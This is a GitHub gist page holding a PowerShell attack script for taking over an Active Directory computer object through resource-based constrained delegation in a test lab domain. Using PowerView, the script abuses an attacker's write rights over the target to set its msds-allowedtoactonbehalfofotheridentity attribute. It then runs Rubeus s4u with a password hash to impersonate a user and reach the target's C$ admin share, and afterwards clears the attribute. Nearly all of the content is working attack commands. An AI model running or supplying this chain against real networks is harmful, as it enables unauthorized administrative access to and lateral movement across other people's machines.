-
-
Save HarmJ0y/a1ae1cf09e5ac89ee15fb3da25dcb10a to your computer and use it in GitHub Desktop.
Resource-based Constrained Delegation ACL-based Computer Object Takeover
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # the target computer object we're taking over | |
| $TargetComputer = "primary.testlab.local" | |
| # find targets with S4U2Self enabled | |
| Get-DomainObject -LDAPFilter '(userAccountControl:1.2.840.113556.1.4.803:=16777216)' -Properties samaccountname,useraccountcontrol | fl | |
| # get our attacker's SID (account with rights over the target) | |
| $AttackerSID = Get-DomainUser attacker -Properties objectsid | Select -Expand objectsid | |
| # verify the GenericWrite permissions on $TargetComputer | |
| $ACE = Get-DomainObjectACL $TargetComputer | ?{$_.SecurityIdentifier -match $AttackerSID} | |
| $ACE | |
| ConvertFrom-SID $ACE.SecurityIdentifier | |
| # the identity we control that we want to grant S4U access to the target | |
| $S4UIdentity = "TESTLAB\constraineduser" | |
| # translate the identity to a security identifier | |
| $IdentitySID = ((New-Object -TypeName System.Security.Principal.NTAccount -ArgumentList $S4UIdentity).Translate([System.Security.Principal.SecurityIdentifier])).Value | |
| # substitute the security identifier into the raw SDDL | |
| $SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($IdentitySID))" | |
| # get the binary bytes for the SDDL | |
| $SDBytes = New-Object byte[] ($SD.BinaryLength) | |
| $SD.GetBinaryForm($SDBytes, 0) | |
| # set new security descriptor for 'msds-allowedtoactonbehalfofotheridentity' | |
| Get-DomainComputer $TargetComputer | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Verbose | |
| # check that the ACE added correctly | |
| $RawBytes = Get-DomainComputer $TargetComputer -Properties 'msds-allowedtoactonbehalfofotheridentity' | select -expand msds-allowedtoactonbehalfofotheridentity | |
| $Descriptor = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList $RawBytes, 0 | |
| $Descriptor.DiscretionaryAcl | |
| ConvertFrom-SID $Descriptor.DiscretionaryAcl.SecurityIdentifier | |
| # execute Rubeus' s4u process against $TargetComputer | |
| whoami | |
| dir \\primary.testlab.local\C$ | |
| Rubeus.exe s4u /user:constraineduser /rc4:2b576acbe6bcfda7294d6bd18041b8fe /impersonateuser:harmj0y /msdsspn:cifs/primary.testlab.local /ptt | |
| dir \\primary.testlab.local\C$ | |
| # clear the 'msds-allowedtoactonbehalfofotheridentity' security descriptor out | |
| Get-DomainComputer $TargetComputer | Set-DomainObject -Clear 'msds-allowedtoactonbehalfofotheridentity' -Verbose |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment